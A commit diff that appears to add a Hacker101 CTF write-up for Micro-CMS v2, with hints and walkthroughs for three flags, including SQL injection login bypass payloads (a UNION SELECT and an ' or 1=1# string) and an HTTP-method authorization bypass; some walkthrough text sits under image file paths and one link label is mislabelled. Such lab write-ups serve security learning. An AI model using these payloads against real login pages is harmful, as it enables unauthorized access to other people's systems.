micro-cms-v2

Author: testert1ng

README.md

@@ -10,9 +10,11 @@
 | ------------------- | ------------------------------------------ | ------ | ---------- |
 | Trivial (1 / flag)  | [A little something to get you started][2] | Web    | 1 / 1      |
 | Easy (2 / flag)     | [Micro-CMS v1][3]                          | Web    | 4 / 4      |
+| Moderate (3 / flag) | [Micro-CMS v2][5]                          | Web    | 3 / 3      |
 | Moderate (5 / flag) | [TempImage][4]                             | Web    | 2 / 2      |
 
 [1]: https://ctf.hacker101.com/ctf
 [2]: ./a_little_something_to_get_you_started
 [3]: ./micro-cms_v1
-[4]: ./tempimage
+[4]: ./tempimage
+[3]: ./micro-cms_v2

micro-cms_v2/README.md

@@ -0,0 +1,17 @@
+# Micro-CMS v2
+
+## [Flag0](./flag0) -- Found
+
+- Regular users can only see public pages
+- Getting admin access might require a more perfect union
+- Knowing the password is cool, but there are other approaches that might be easier
+
+## [Flag1](./flag1) -- Found
+
+- What actions could you perform as a regular user on the last level, which you can't now?
+- Just because request fails with one method doesn't mean it will fail with a different method
+- Different requests often have different required authorization
+
+## [Flag2](./flag2) -- Found
+
+- Credentials are secret, flags are secret. Coincidence?

micro-cms_v2/flag0/README.md

@@ -0,0 +1,50 @@
+# Micro-CMS v2 - FLAG0
+
+## 0x00 Index
+
+![](./imgs/index.jpg)
+
+## 0x01 Log In
+
+Try create a new page. Redirect to log in page.
+
+Try with weak password. Not working.
+
+![](./imgs/login.jpg)
+
+## 0x02 Try Add '
+
+Get SQL error page
+
+```
+Traceback (most recent call last):
+  File "./main.py", line 145, in do_login
+    if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
+  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
+    self.errorhandler(self, exc, value)
+  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
+    raise errorvalue
+ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1")
+```
+
+## 0x03 Bypass Login
+
+USERNAME = 
+
+```sql
+' UNION SELECT '123' AS password#
+```
+
+and PASSWORD = 123
+
+```sql
+SELECT password FROM admins WHERE username='admin' UNION SELECT '123' AS password#
+```
+
+![](./imgs/success.jpg)
+
+## 0x04 Private Page (FLAG)
+
+![](./imgs/private.jpg)
+
+![](./imgs/flag.jpg)

micro-cms_v2/flag0/imgs/flag.jpg

@@ -0,0 +1,23 @@
+# Micro-CMS v2 - FLAG1
+
+## 0x00 Index
+
+![](../flag0/imgs/index.jpg)
+
+## 0x01 Edit
+
+Try edit page with normal user.
+
+```
+http://127.0.0.1:5001/xxxxxxxxxx/page/edit/1
+```
+
+### GET
+
+Also redirect to log in page.
+
+![](./imgs/get.jpg)
+
+### POST (FLAG)
+
+![](./imgs/post.jpg)

micro-cms_v2/flag0/imgs/index.jpg

@@ -0,0 +1,23 @@
+# Micro-CMS v2 - FLAG2
+
+## 0x00 Index
+
+![](../flag0/imgs/index.jpg)
+
+## 0x01 Log In
+
+Try bypass username using 
+
+```
+' or 1=1#
+```
+
+And try run the password.
+
+![](./imgs/login.jpg)
+
+## 0x02 FLAG
+
+Get FLAG and password **grover**
+
+![](./imgs/flag.jpg)